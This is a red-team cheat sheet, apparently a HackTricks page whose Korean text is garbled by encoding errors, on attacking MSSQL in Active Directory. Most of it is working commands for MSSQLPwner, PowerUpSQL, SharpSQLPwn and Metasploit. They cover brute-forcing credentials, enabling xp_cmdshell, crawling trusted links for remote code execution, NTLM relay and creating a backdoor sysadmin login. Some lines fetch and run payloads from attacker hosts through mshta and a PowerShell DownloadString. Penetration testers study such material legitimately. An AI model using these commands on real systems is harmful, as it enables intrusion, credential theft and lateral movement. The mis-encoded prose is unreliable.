MSSQL AD ๋‚จ์šฉ

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

MSSQL ์—ด๊ฑฐ / ๋ฐœ๊ฒฌ

Python

MSSQLPwner ๋„๊ตฌ๋Š” impacket์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•˜๋ฉฐ, kerberos ํ‹ฐ์ผ“์„ ์‚ฌ์šฉํ•˜์—ฌ ์ธ์ฆํ•˜๊ณ  ๋งํฌ ์ฒด์ธ์„ ํ†ตํ•ด ๊ณต๊ฒฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

```shell # Interactive mode mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive

Interactive mode with 2 depth level of impersonations

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -max-impersonation-depth 2 interactive

Executing custom assembly on the current server with windows authentication and executing hostname command

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname

Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname

Executing the hostname command using stored procedures on the linked SRV01 server

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname

Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec โ€œcmd /c mshta http://192.168.45.250/malicious.htaโ€ -command-execution-method sp_oacreate

Issuing NTLM relay attack on the SRV01 server

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

Issuing NTLM relay attack on the local server with custom command

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250

Executing direct query

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query โ€œSELECT CURRENT_USERโ€

Retrieving password from the linked server DC01

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrive-password

Execute code using custom assembly on the linked server DC01

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 inject-custom-asm SqlInject.dll

Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt

mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt

Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt

mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt

Bruteforce using tickets against the hosts listed on the hosts.txt

mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt

Bruteforce using passwords against the hosts listed on the hosts.txt

mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt

Bruteforce using hashes against the hosts listed on the hosts.txt

mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt

### ๋„๋ฉ”์ธ ์„ธ์…˜ ์—†์ด ๋„คํŠธ์›Œํฌ์—์„œ ์—ด๊ฑฐํ•˜๊ธฐ

Interactive mode

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive

---
###  Powershell

์ด ๊ฒฝ์šฐ์— powershell ๋ชจ๋“ˆ [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL)์ด ๋งค์šฐ ์œ ์šฉํ•ฉ๋‹ˆ๋‹ค.
```bash
Import-Module .\PowerupSQL.psd1

๋„๋ฉ”์ธ ์„ธ์…˜ ์—†์ด ๋„คํŠธ์›Œํฌ์—์„œ ์—ด๊ฑฐํ•˜๊ธฐ

# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP โ€“Verbose โ€“Threads 10

#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test

๋„๋ฉ”์ธ ๋‚ด๋ถ€์—์„œ ์—ด๊ฑฐํ•˜๊ธฐ

# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose

# Try dictionary attack to login
Invoke-SQLAuditWeakLoginPw

# Search SPNs of common software and try the default creds
Get-SQLServerDefaultLoginPw

#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose

#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

MSSQL ๊ธฐ๋ณธ ์•…์šฉ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ ‘๊ทผ

# List databases
Get-SQLInstanceDomain | Get-SQLDatabase

# List tables in a DB you can read
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName DBName

# List columns in a table
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName DBName -TableName TableName

# Get some sample data from a column in a table (columns username & passwor din the example)
Get-SQLInstanceDomain | GetSQLColumnSampleData -Keywords "username,password" -Verbose -SampleSize 10

#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"

#Dump an instance (a lot of CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"

# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize

MSSQL RCE

MSSQL ํ˜ธ์ŠคํŠธ ๋‚ด์—์„œ ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๋Š” ๊ฒƒ๋„ ๊ฐ€๋Šฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary

๋‹ค์Œ ์„น์…˜์—์„œ ์ˆ˜๋™์œผ๋กœ ์ˆ˜ํ–‰ํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค.

MSSQL ๊ธฐ๋ณธ ํ•ดํ‚น ๊ธฐ๋ฒ•

1433 - Pentesting MSSQL - Microsoft SQL Server

MSSQL ์‹ ๋ขฐ ๋งํฌ

MSSQL ์ธ์Šคํ„ด์Šค๊ฐ€ ๋‹ค๋ฅธ MSSQL ์ธ์Šคํ„ด์Šค์— ์˜ํ•ด ์‹ ๋ขฐ๋ฐ›๋Š” ๊ฒฝ์šฐ(๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋งํฌ). ์‚ฌ์šฉ์ž๊ฐ€ ์‹ ๋ขฐ๋œ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์— ๋Œ€ํ•œ ๊ถŒํ•œ์„ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค๋ฉด, ๊ทธ๋Š” ์‹ ๋ขฐ ๊ด€๊ณ„๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋‹ค๋ฅธ ์ธ์Šคํ„ด์Šค์—์„œ๋„ ์ฟผ๋ฆฌ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์‹ ๋ขฐ๋Š” ์—ฐ๊ฒฐ๋  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์–ด๋А ์‹œ์ ์—์„œ ์‚ฌ์šฉ์ž๋Š” ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ์ž˜๋ชป ๊ตฌ์„ฑ๋œ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๊ฐ„์˜ ๋งํฌ๋Š” ํฌ๋ฆฌ์ŠคํŠธ ์‹ ๋ขฐ๋ฅผ ๋„˜์–ด ์ž‘๋™ํ•ฉ๋‹ˆ๋‹ค.

Powershell ๋‚จ์šฉ

#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0

#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose

#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "<INSTANCE1>" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'

#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"

#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql  -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'

#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"

#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv โ€“Verbose โ€“Instance "SQLServer1\Instance1"

#Manual trusted link queery
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
## Enable xp_cmdshell and check it
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
## If you see the results of @@selectname, it worked
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'

๋˜ ๋‹ค๋ฅธ ์œ ์‚ฌํ•œ ๋„๊ตฌ๋Š” https://github.com/lefayjey/SharpSQLPwn:

SharpSQLPwn.exe /modules:LIC /linkedsql:<fqdn of SQL to exeecute cmd in> /cmd:whoami /impuser:sa
# Cobalt Strike
inject-assembly 4704 ../SharpCollection/SharpSQLPwn.exe /modules:LIC /linkedsql:<fqdn of SQL to exeecute cmd in> /cmd:whoami /impuser:sa

Metasploit

metasploit์„ ์‚ฌ์šฉํ•˜์—ฌ ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” ๋งํฌ๋ฅผ ์‰ฝ๊ฒŒ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session

๋ฉ”ํƒ€์Šคํ”Œ๋กœ์ž‡์€ MSSQL์—์„œ openquery() ํ•จ์ˆ˜๋งŒ์„ ์•…์šฉํ•˜๋ ค๊ณ  ์‹œ๋„ํ•  ๊ฒƒ์ž…๋‹ˆ๋‹ค (๋”ฐ๋ผ์„œ, openquery()๋กœ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์—†๋‹ค๋ฉด, ์•„๋ž˜์—์„œ ๋” ์ž์„ธํžˆ ์„ค๋ช…ํ•˜๋Š” EXECUTE ๋ฐฉ๋ฒ•์„ ์ˆ˜๋™์œผ๋กœ ์‹œ๋„ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.)

์ˆ˜๋™ - Openquery()

๋ฆฌ๋ˆ…์Šค์—์„œ sqsh์™€ mssqlclient.py๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ MSSQL ์ฝ˜์†” ์…ธ์„ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์œˆ๋„์šฐ์—์„œ๋„ ๋งํฌ๋ฅผ ์ฐพ์•„ ์ˆ˜๋™์œผ๋กœ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, MSSQL ํด๋ผ์ด์–ธํŠธ๋กœ HeidiSQL์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์œˆ๋„์šฐ ์ธ์ฆ์„ ์‚ฌ์šฉํ•˜์—ฌ ๋กœ๊ทธ์ธ:

์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” ๋งํฌ ์ฐพ๊ธฐ

select * from master..sysservers;
EXEC sp_linkedservers;

์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” ๋งํฌ์—์„œ ์ฟผ๋ฆฌ ์‹คํ–‰

๋งํฌ๋ฅผ ํ†ตํ•ด ์ฟผ๋ฆฌ๋ฅผ ์‹คํ–‰ํ•ฉ๋‹ˆ๋‹ค (์˜ˆ: ์ƒˆ๋กœ ์ ‘๊ทผ ๊ฐ€๋Šฅํ•œ ์ธ์Šคํ„ด์Šค์—์„œ ๋” ๋งŽ์€ ๋งํฌ ์ฐพ๊ธฐ):

select * from openquery("dcorp-sql1", 'select * from master..sysservers')

Warning

๋”๋ธ” ๋ฐ ์‹ฑ๊ธ€ ์ธ์šฉ๋ถ€ํ˜ธ๊ฐ€ ์‚ฌ์šฉ๋˜๋Š” ์œ„์น˜๋ฅผ ํ™•์ธํ•˜์„ธ์š”. ๊ทธ๋ ‡๊ฒŒ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ด ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค.

์ด ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” ๋งํฌ ์ฒด์ธ์„ ์ˆ˜๋™์œผ๋กœ ๋ฌดํ•œํžˆ ๊ณ„์†ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

# First level RCE
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')

# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')

openquery()์—์„œ exec xp_cmdshell๊ณผ ๊ฐ™์€ ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์—†๋Š” ๊ฒฝ์šฐ EXECUTE ๋ฐฉ๋ฒ•์„ ์‚ฌ์šฉํ•ด ๋ณด์‹ญ์‹œ์˜ค.

์ˆ˜๋™ - EXECUTE

EXECUTE๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” ๋งํฌ๋ฅผ ์•…์šฉํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค:

#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"

๋กœ์ปฌ ๊ถŒํ•œ ์ƒ์Šน

MSSQL ๋กœ์ปฌ ์‚ฌ์šฉ์ž๋Š” ์ผ๋ฐ˜์ ์œผ๋กœ **SeImpersonatePrivilege**๋ผ๋Š” ํŠน๋ณ„ํ•œ ์œ ํ˜•์˜ ๊ถŒํ•œ์„ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ๊ณ„์ •์ด โ€œ์ธ์ฆ ํ›„ ํด๋ผ์ด์–ธํŠธ๋ฅผ ๊ฐ€์žฅํ•  ์ˆ˜ ์žˆ๋„๋กโ€ ํ—ˆ์šฉํ•ฉ๋‹ˆ๋‹ค.

๋งŽ์€ ์ €์ž๋“ค์ด ์ œ์•ˆํ•œ ์ „๋žต ์ค‘ ํ•˜๋‚˜๋Š” SYSTEM ์„œ๋น„์Šค๊ฐ€ ๊ณต๊ฒฉ์ž๊ฐ€ ์ƒ์„ฑํ•œ ์•…์„ฑ ๋˜๋Š” ์ค‘๊ฐ„์ž ์„œ๋น„์Šค์— ์ธ์ฆํ•˜๋„๋ก ๊ฐ•์ œํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด ์•…์„ฑ ์„œ๋น„์Šค๋Š” ์ธ์ฆ์„ ์‹œ๋„ํ•˜๋Š” ๋™์•ˆ SYSTEM ์„œ๋น„์Šค๋ฅผ ๊ฐ€์žฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

SweetPotato์—๋Š” Beacon์˜ execute-assembly ๋ช…๋ น์„ ํ†ตํ•ด ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ๋‹ค์–‘ํ•œ ๊ธฐ์ˆ ์ด ๋ชจ์—ฌ ์žˆ์Šต๋‹ˆ๋‹ค.

SCCM ๊ด€๋ฆฌ ์ง€์  NTLM ๋ฆด๋ ˆ์ด (OSD ๋น„๋ฐ€ ์ถ”์ถœ)

SCCM ๊ด€๋ฆฌ ์ง€์ ์˜ ๊ธฐ๋ณธ SQL ์—ญํ• ์ด ์‚ฌ์ดํŠธ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์—์„œ ๋„คํŠธ์›Œํฌ ์•ก์„ธ์Šค ๊ณ„์ • ๋ฐ ์ž‘์—… ์‹œํ€€์Šค ๋น„๋ฐ€์„ ๋คํ”„ํ•˜๋Š” ๋ฐ ์–ด๋–ป๊ฒŒ ์•…์šฉ๋  ์ˆ˜ ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค:

Sccm Management Point Relay Sql Policy Secrets

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ